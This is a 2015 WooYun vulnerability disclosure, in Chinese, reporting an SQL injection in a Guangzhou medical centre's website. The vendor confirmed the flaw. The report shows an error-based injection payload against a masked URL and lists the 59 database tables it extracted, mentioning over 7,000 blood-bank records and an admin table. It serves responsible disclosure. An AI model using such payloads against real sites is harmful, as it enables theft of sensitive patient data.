当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135416

漏洞标题:广州市某医疗中心sql注入数据库泄露

相关厂商:广东省信息安全测评中心

漏洞作者: ksss

提交时间:2015-08-20 20:31

修复时间:2015-10-05 12:04

公开时间:2015-10-05 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

RT

详细说明:

QQ截图20150819221332.png


http://**.**.**.**/cn/newsframe.aspx?typeid=1 AND 7586=convert(int,(db_name()))


QQ截图20150819221526.png


QQ截图20150819221641.png


Database: bds0050152_db
[59 tables]
+----------------------+
| ChinaArea |
| Whir_AccessStat |
| Whir_AdZone |
| Whir_AdminInfo |
| Whir_AdminRole |
| Whir_Choice |
| Whir_ChoiceType |
| Whir_Column |
| Whir_CommonCategory |
| Whir_ErrorLog |
| Whir_Field |
| Whir_FieldCheckBox |
| Whir_FieldDateText |
| Whir_FieldEditor |
| Whir_FieldOption |
| Whir_FieldText |
| Whir_FieldUpload |
| Whir_IP |
| Whir_JobRequest |
| Whir_Model |
| Whir_ModelForm |
| Whir_ModelForms |
| Whir_ModelTemplate |
| Whir_Module |
| Whir_OperateLog |
| Whir_Publish |
| Whir_Reply |
| Whir_Source |
| Whir_Survey |
| Whir_SurveyItem |
| Whir_Tag |
| Whir_U_Advert |
| Whir_U_Answer |
| Whir_U_BlogCategory |
| Whir_U_BlogComment |
| Whir_U_BlogFavorites |
| Whir_U_BlogNews |
| Whir_U_BlogPic |
| Whir_U_BlogSingle |
| Whir_U_BlogUserInfo |
| Whir_U_Daoyi |
| Whir_U_FAQ |
| Whir_U_Grade |
| Whir_U_Link |
| Whir_U_Member |
| Whir_U_News |
| Whir_U_News1 |
| Whir_U_Out |
| Whir_U_SinglePage |
| Whir_U_UserInfoLog |
| Whir_WordFilter |
| blood |
| tbtempmatch |
| xhx_CLASS |
| xhx_aboutus |
| xhx_admin |
| xhx_getinfo |
| xhx_message |
| xhx_siteweb |
+----------------------+


表挺多的,从库来看网站搭了博客也搭了论坛,还有7000多条blood血库信息
管理员表

QQ截图20150819222004.png


QQ截图20150819222107.png


漏洞证明:

QQ截图20150819221641.png


QQ截图20150819221526.png

修复方案:

过滤

版权声明:转载请注明来源 ksss@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-21 12:03

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:12
正在联系相关网站管理单位处置。

最新状态:

暂无